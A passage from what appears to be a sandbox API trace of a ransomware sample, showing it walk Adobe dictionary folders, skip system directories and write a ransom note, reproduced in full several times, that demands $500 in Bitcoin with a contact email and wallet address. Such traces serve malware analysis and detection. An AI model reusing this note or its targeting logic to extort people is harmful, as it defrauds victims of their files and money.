pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*") returned 111 [0087.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.415] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.415] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\.") returned 111 [0087.415] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.415] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.415] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\..") returned 112 [0087.415] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.415] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.415] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.415] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\RESTORE_FILES.txt") returned 127 [0087.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dut\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.416] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.416] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.417] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.417] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.417] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.417] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.417] CloseHandle (hObject=0x154) returned 1 [0087.417] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Windows") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Program Files (x86)") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="$Recycle.bin") returned 1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="System Volume Information") returned -1 [0087.417] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned 109 [0087.417] lstrcmpW (lpString1="eng", lpString2=".") returned 1 [0087.417] lstrcmpW (lpString1="eng", lpString2="..") returned 1 [0087.417] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*") returned 111 [0087.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.417] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.417] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.417] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.417] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\.") returned 111 [0087.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.417] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.418] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.418] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.418] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\..") returned 112 [0087.418] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.418] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.418] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.418] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\RESTORE_FILES.txt") returned 127 [0087.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\eng\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.419] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.419] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.420] CloseHandle (hObject=0x154) returned 1 [0087.420] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned 109 [0087.420] lstrcmpW (lpString1="frn", lpString2=".") returned 1 [0087.420] lstrcmpW (lpString1="frn", lpString2="..") returned 1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*") returned 111 [0087.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\.") returned 111 [0087.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.420] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\..") returned 112 [0087.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.420] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.420] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\RESTORE_FILES.txt") returned 127 [0087.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\frn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.421] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.421] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.421] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.421] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.422] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.422] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.422] CloseHandle (hObject=0x154) returned 1 [0087.422] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1="grm", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned 109 [0087.422] lstrcmpW (lpString1="grm", lpString2=".") returned 1 [0087.422] lstrcmpW (lpString1="grm", lpString2="..") returned 1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*") returned 111 [0087.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.422] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\.") returned 111 [0087.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.422] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.422] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.422] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.422] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\..") returned 112 [0087.422] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.422] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.423] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.423] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\RESTORE_FILES.txt") returned 127 [0087.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\grm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.423] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.423] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.424] lstrlenA 